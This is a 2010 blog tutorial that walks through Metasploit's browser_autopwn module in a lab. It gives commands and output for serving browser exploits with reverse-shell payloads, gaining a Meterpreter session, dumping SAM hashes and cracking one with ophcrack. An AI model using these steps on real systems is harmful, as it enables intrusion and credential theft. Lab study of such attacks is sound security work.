Saturday, October 16, 2010

Metasploit Browser Autopwn module

In previous article I've shown the using of windows/browser/ms10_018_ie_behaviors exploit. In many cases trying exploits one by one is not acceptable, so the auxiliary modules have been created. One of these - server/browser_autopwn:

This module uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them.
After successful attack it creates Meterpreter session, so you can gain a full access to target. Meterpreter is a set of tools for interacting with processes, networking, and the file system of the target. In this article we will dump the SAM hash of the target system and decrypt it using ophcrack.

Let's go directly to the actions (set the LHOST parameter according to your environment):

$ msfconsole

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.5.0-dev [core:3.5 api:1.0]
+ -- --=[ 609 exploits - 306 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
       =[ svn r10702 updated today (2010.10.16)

msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 192.168.1.4...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/BJgBiYk7u
[*]  Local IP: http://192.168.1.4:8080/BJgBiYk7u
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/b4tlM3eiEU
[*]  Local IP: http://192.168.1.4:8080/b4tlM3eiEU
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kYOA4qdf
[*]  Local IP: http://192.168.1.4:8080/kYOA4qdf
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/9LcmpZH
[*]  Local IP: http://192.168.1.4:8080/9LcmpZH
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/8MdK9BAs4
[*]  Local IP: http://192.168.1.4:8080/8MdK9BAs4
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/pe0Vuj45dvPe
[*]  Local IP: http://192.168.1.4:8080/pe0Vuj45dvPe
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/revy5q9w8w5N
[*]  Local IP: http://192.168.1.4:8080/revy5q9w8w5N
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/DUTrhcqFOO6xs
[*]  Local IP: http://192.168.1.4:8080/DUTrhcqFOO6xs
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/5XVCWnoMqacO
[*]  Local IP: http://192.168.1.4:8080/5XVCWnoMqacO
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/EhHMxWs57
[*]  Local IP: http://192.168.1.4:8080/EhHMxWs57
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/UUCTPw
[*]  Local IP: http://192.168.1.4:8080/UUCTPw
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/g4qC3ja86wRx
[*]  Local IP: http://192.168.1.4:8080/g4qC3ja86wRx
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/B3ubMz5o
[*]  Local IP: http://192.168.1.4:8080/B3ubMz5o
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/VkEV5COr
[*]  Local IP: http://192.168.1.4:8080/VkEV5COr
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/gexr41obZOSD
[*]  Local IP: http://192.168.1.4:8080/gexr41obZOSD
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.1.4:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.1.4:6666
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.1.4:7777
[*] Starting the payload handler...

[*] --- Done, found 15 exploit modules

[*] Using URL: http://0.0.0.0:8080/yaVpbn
[*]  Local IP: http://192.168.1.4:8080/yaVpbn
[*] Server started.


Now the open the server URL (in my case http://192.168.1.4:8080/yaVpbn) on the target system. If it is possible, exploitation will take place, and the browser will freeze. But on your side you'll have a full access via meterpreter:

[*] Request '/yaVpbn' from 192.168.1.4:60674
[*] Request '/yaVpbn?sessid=V2luZG93czpYUDpTUDM6ZW4tdXM6eDg2Ok1TSUU6Ny4wOg%3d%3d' from 192.168.1.4:60674
[*] JavaScript Report: Windows:XP:SP3:en-us:x86:MSIE:7.0:
[*] Responding with exploits
[*] Handling request from 192.168.1.4:60676...
[*] Payload will be a Java reverse shell to 192.168.1.4:7777 from 192.168.1.4...
[*] Generated jar to drop (4447 bytes).
[*] Handling request from 192.168.1.4:60677...
[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.1.4:60676 (target: IE 7.0 (marquee))...
[*] Sending stage (749056 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.4:3333 -> 192.168.1.4:36137) at 2010-10-16 17:55:58 +1100
[*] Session ID 1 (192.168.1.4:3333 -> 192.168.1.4:36137) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1100)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 252
[*] New server process: notepad.exe (252)

As you can see the browser_autopwn module have selected the same exploit we have used in the previous article (Internet Explorer DHTML Behaviors Use After Free). Let's take a look which session are available:

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  OFF-VULN\test @ OFF-VULN (ADMIN)  192.168.1.4:3333 -> 192.168.1.4:36137

So, we're in. Let's dump the SAM hashes:

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > hashdump
adm1n:1004:943822724a4e343daad3b435b51404ee:66c94dd046a6a5a48cf6cb8fb97b9ca9:::
HelpAssistant:1000:e315de19e2ecfd09ac944a7c45ee7894:db21e5566c18ac367534aea644650433:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:46cc7949aa9d8c0280b72b7b6623a9c4:::
test:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
�������������:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
�����:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Let's decrypt the password of the user "adm1n". Open ophcrack, and select "Load"->"Single hash":







Insert the hash from the data we've received and click OK. Now the hash is ready to be decrypted, so don't waste time and click "Crack". The results:


It looks like our adm1n is pretty self-assured. I won't be in his place, and at least update the system.

Meterpreter have many other useful commands and can even be programmed via scripts. It's a powerful tool and don't forget about it during security research. Good luck!

No comments:

Post a Comment